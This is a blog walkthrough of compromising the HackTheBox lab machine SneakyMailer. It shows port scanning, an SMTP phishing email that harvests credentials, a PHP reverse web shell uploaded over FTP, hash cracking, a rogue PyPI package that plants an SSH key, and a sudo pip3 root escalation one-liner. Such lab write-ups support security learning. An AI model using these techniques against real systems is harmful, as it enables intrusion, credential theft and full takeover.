SneakyMailer HackTheBox Walkthrough

SneakyMailer HackTheBox Walkthrough

This is SneakyMailer HackTheBox walkthrough. In this writeup I have demonstrated step by step procedure how I rooted to SneakyMailer HTB machine. Before moving ahead let’s us know something about this machine. SneakyMailer is Linux Machine with IP address 10.10.10.197. It is given difficulty medium by its maker.

Now I am going to show you my steps.

First of all connect your local machine with VPN and confirm your connectivity by pinging the IP address 10.10.10.197. As usual, I began by scanning the IP of SneakyMailer machine so that I could get some starting point to proceed further. Nmap [a port scanner] gave the following result.

Scanning

$nmap -sV -sC -oN namp_scan 10.10.10.197

Nmap port scan during SneakyMailer HackTheBox Walkthrough

We have seven ports open. Let’s analyse each ports. Port 21 is open and vsftpd 3.0.3 service is running on it. Checked do we have anonymous login allowed by logging with anonymous: anonymous. But it is not allowed and we require a valid username and password to login. Then searched using searchsploit [tool to search exploits on exploit-db.com remotely] do we have any exploit available for current version of vsftpd server. No exploit available. Left it here and moved forward for further enumeration.

Port 80 is open and ngnix 1.14.2 web server is running over it. Nmap script http-title revealed the domain sneakycorp.htb. Added this domain to my host file.

Host File before Modification

Host File before Modification

Host File after Modification

Hosrt File after modification in SneakyMailer HackTheBox Walkthrough

After going to URL http://sneakycorp.htb/team.php found some users and their email addresses. Created a wordlist of all the email addresses using cewl as any one may be our potential email address to login into email client as port 25 is open.

Wordlist Creation

$cewl -n -e --email_file email.txt http://sneakycorp.htb

Creating email wordlists from the website in SneakyMailer HackTheBox Walkthrough

$cat email.txt

Listing emails created in above steps

Port 25 is open and smtp server is running over it. Since already created an email list so tried to verify email address using SMTP. For more information you can see this video. And can find steps in this interesting article.

Telnet to SMTP Server

Start netcat listener in one window and do telnet in other window

$nc -nvlp 80

$telnet 10.10.10.197 25

~MAIL FROM: xyz.com

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~DATA

Hi Recepients anyone can ping me at http://10.10.14.9

^]

telnet>quit

Telnet to SMTP server to get email info during SneakyMailer HackTheBox Writeups

Once the ping is done correctly you will get response at port 80 this response is only from valid email address. The response is URL encoded so decoded it online.

URL Decoding

URL decoding in SneakyMailer HackTheBox Walkthrough

After URL decoding we have the following information of a user.

firstName : Paul

lastName : Byrd

email : [email protected]

password : ^(#[email protected][%KhIxKk(Ju`hqcHl<:Ht

rpassword : ^(#[email protected][%KhIxKk(Ju`hqcHl<:Ht

Now used this information to login in the email account of user paulbyrd. I have used evolution [a mail client]. Other mail clients can also be used for this purpose.

Login to user paul using evolution mail client

After successful login found a file inside the sent items containing Username and Password

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Didn’t know which account credential is this I mean SSH or FTP. Tried to SSH using developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C but wrong creds. Then tried FTP login using it and successfully logged in.

FTP login

$ftp 10.10.10.197

~developer

~m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

FTP to SneakyMailer HackTheBox using developer account

Uploaded shell.php in /dev/ directory. You can get webshell at /usr/share/webshells/php/ in Kali OS. Tried to access the shell.php at URL http://sneakycorp.htb/shell.php [since index.php is also present in the same folder in which shell.php is present] but didn’t get access. Then, fuzzed the domain sneakycorp.htb WFUZZ for subdomain with seclist's subdomains-top1million-5000.txt wordlists.

FUZZING for subdomain

$wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.sneakycorp.htb" –u http://10.10.10.197/ --hc 400,301 -t 50 -c

Fuzzing for subdomains in Sneakymailer HTB

Got a subdomain dev.sneakycorp.htb. So added it to my /etc/hosts file

Host File after Modification

Host file after modification1

Now the uploaded shell.php in dev folder of ftp account can be accessed at URL http://dev.sneakycorp.htb/shell.php . And we can get remote shell very easily

Getting Shell

1. Upload shell.php in /dev/ directory of ftp

$cd dev

$put shell.php

3. Start netcat listener locally

$nc -nvlp 2345

4. Access the URL http://dev.sneakycorp.htb/shell.php

Uploading reverse shell using ftp and getting reverse connection on local system

Upgrade Shell

Upgrade shell to fully qualified Linux Shell

$python -c ‘import pty;pty.spawn("/bin/bash")’

CTRL + Z #to background the session

#stty raw -echo

#fg

Plus two times press enter

$export TERM=xterm-256color

$stty rows 60 columns 130

Host file before modification2

After some enumeration got a subdomain pypi.sneakycorp.htb inside /www/var/ directory, so added it to the /etc/hosts file. After modification the /etc/hosts file looks like

Hosts File after Modification

Host file after modification 2

On further enumeration find password hash in .htpasswd file inside /var/www/pypi.sneakycorp.htb/ directory

$ cat /var/www/pypi.sneakycorp.htb/.htpasswd

Showing password inside .htpasswd file

pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Identify Hash

Identifying Hash Online

Hash identification give possible algorithms: Apache MD5, md5apr1, MD5 (APR)

Stored the hash inside a file hash.txt and tried to crack it using hashcat [fastest hash cracker] and rockyou.txt wordlist

Cracking Hash

$hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt –force

Starting to crack hash using hashcat
password cracking using hashcat status
Showing password cracked using hashcat

Credential is pypi: soufianeelhaoui

Tried to use this credential to SSH and FTP but didn’t login. After going to URL http://pypi.sneakycorp.htb:8080 got pypiserver is running. No idea what to do next. After some googling found this article

Pypiserver panel

According to the above article we can create a python package and that package can be deployed or stored inside the Pypi repository. And the stored package can be accessed using pypiserver.

Created a package named mypkg following the same steps as given in this https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/ article. Please read above article before creating and storing python package to pypi repository. I have reduced the number of steps, although I have done the same things as given in the above link.

Creating Python Package

$mkdir mypkg

$cd mypkg

$touch setup.py setup.cfg README.md

$mkdir mypkg

$cd mypkg

$nano __init__.py

$cat __init__.py

creating mypkg directory and introducing content to it

Generated ssh keys on my local computer because wanted to add my public key inside /home/low/.ssh/authorized_keys file. We will introduce our custom code into setup.py file to add our public ssh key to /home/low/.ssh/authorized_keys file

[email protected]:~/.ssh# ssh-keygen

creating SSH key locally using ssh-keygen command

$nano setup.py #Introduce your SSH Public Key inside this file

$cat setup.py

listing content of setup.py file inside mypkg home directory

$nano setup.cfg

$cat setup.cfg

Listing content of setup.cfg file inside mypkg folder

$python3 setup.py sdist #Compress package

$export HOME=/tmp/mypkg

$nano .pypirc #Create this file inside home directory

$cat .pypirc

lisiting content of pypirc file in home directory

$ python3 setup.py sdist upload -r mypkg # Upload package to repository

Uploading package to Pypi repository during SneakyMailer HackTheBox Walkthrough

We can see the written SSH key inside authorized_keys file and can confirm with which is present on our local computer.

$ cat /home/low/.ssh/authorized_keys

Listing content of authorized_keys of user low in SneakyMailer HackTheBox Walkthrough

Once we have written our SSH key to the authorized_keys file of user low, we can SSH into low’s account remotely via our private key which is stored inside our local computer /root/.ssh/ directory

SSH using Private Key

[email protected]:~/.ssh# chmod 700 id_rsa

[email protected]:~/.ssh# ssh -i id_rsa [email protected]

Login remotely using private ssh key in sneakymailer HackTheBox Machine

Capture User FLAG

$cat user.txt

SneakyMailer HackTheBox user flag found during Walkthrough

Privilege Escalation

Finding PrivEsc Vector

Ran command $sudo -l to check special privilege user low has.

$ sudo -l

Checking special permission of user low using sudo

Got that user low can execute /usr/bin/pip3 command on SneakyMailer. So here our privilege escalation vector is exploitation of sudo rights. The exploitation is very easy just by entering three line of codes one by one. See this article https://gtfobins.github.io/gtfobins/pip/

$ TF=$(mktemp -d)

$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

$ sudo pip3 install $TF

SneakyMailer HackTheBox
privilege escalation using pip3 in Walkthrough

Capture Root Flag

#cat /root/root.txt

SneakyMailer HackTheBox root flag found after walkthrough

This is how I rooted to the SneakyMailer HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Having any issue feel free to comment us. Want to give any suggestion about the writeup please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/

This Post Has 7 Comments

  1. Habibi

    Nice thanks

  2. StupidOne

    hello, could your explain, how did you write down ssh public key to authorized_keys. It seems that only low has rights to modify. Is it just because low is related to pypi-pkg group? And while package was uploading there was the possibility to write to authorized_keys.

    1. Yes. It is because user low is related to pypi-pkg. In setup.py file we introduce our SSH key inside try block and remaining code inside except block. If writing of SSH key is successful it will leave except block. The ssh key is written to /home/low/.ssh/authorized_keys file due to write permission given to package folder and its file inside /var/www/pypi.sneakycorp.htb directory.

      1. StupidOne

        OK, thank you for reply. Actually, it is very nice writeup.

  3. Bharath Raju

    Could you help me login into the evolution found it difficult using it for the first time

  4. Buy CBD

    Your style is so unique in comparison to other
    people I’ve read stuff from. Many thanks for posting when you have the opportunity,
    Guess I will just book mark this site.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.